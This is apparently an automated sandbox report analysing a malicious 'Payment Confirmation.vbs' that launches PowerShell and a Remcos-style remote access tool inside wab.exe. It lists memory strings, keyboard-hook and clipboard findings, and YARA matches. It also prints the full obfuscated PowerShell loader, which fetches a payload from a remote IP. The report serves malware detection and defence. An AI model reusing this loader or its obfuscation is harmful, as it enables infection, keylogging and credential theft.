                Source: wscript.exe, 00000000.00000003.1367319051.00000291C2211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?de1648c5cc022
                Source: wscript.exe, 00000000.00000003.1373805835.00000291C21B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373658908.00000291C218F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1374863490.00000291C21B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabR
                Source: wscript.exe, 00000000.00000002.1374823371.00000291C219C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373658908.00000291C218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmeB
                Source: wscript.exe, 00000000.00000003.1367225392.00000291C3F81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367762255.00000291C3FA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367386593.00000291C3FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?de1648c5cc
                Source: wab.exe, 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2645737177.0000000000888000.00000004.00000020.00020000.00000000.sdmp, bhvB28E.tmp.11.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpHz
                Source: powershell.exe, 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://ocspx.digicert.com0E
                Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1762762015.00000000049B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhvB28E.tmp.11.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: wab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: wab.exe, wab.exe, 0000000D.00000002.1834909527.000000000381D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: wab.exe, 0000000D.00000002.1834909527.000000000381D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                Source: wab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: wab.exe, 0000000A.00000002.2670331878.0000000020DB0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: wab.exe, 0000000B.00000002.1848453717.0000000000584000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E5F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.1762762015.00000000049B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000005.00000002.1762762015.0000000004B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1811161697.00000258E71A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: powershell.exe, 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1765124979.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-08-30-16/PreSignInSettingsConfig.json
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=13164f2a9ee6956f1439
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=b92552
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: wab.exe, wab.exe, 0000000D.00000002.1833464920.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvB28E.tmp.11.drString found in binary or memory: https://www.office.com/

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041183A OpenClipboard,GetLastError,DeleteFileW,11_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_004072B5

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6968, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_8080.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Payment Confirmation.vbsStatic file information: Suspicious name
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9387
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9387
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9387Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9387Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B12BEA22_2_00007FFB4B12BEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B12B0F62_2_00007FFB4B12B0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B123FFA2_2_00007FFB4B123FFA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B12208D2_2_00007FFB4B12208D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DEB5C110_2_20DEB5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DF719410_2_20DF7194
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B04011_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043610D11_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044731011_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A49011_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040755A11_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043C56011_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B61011_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044D6C011_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004476F011_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B87011_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044081D11_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041495711_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004079EE11_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407AEB11_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044AA8011_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00412AA911_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B7411_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B0311_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044BBD811_2_0044BBD8
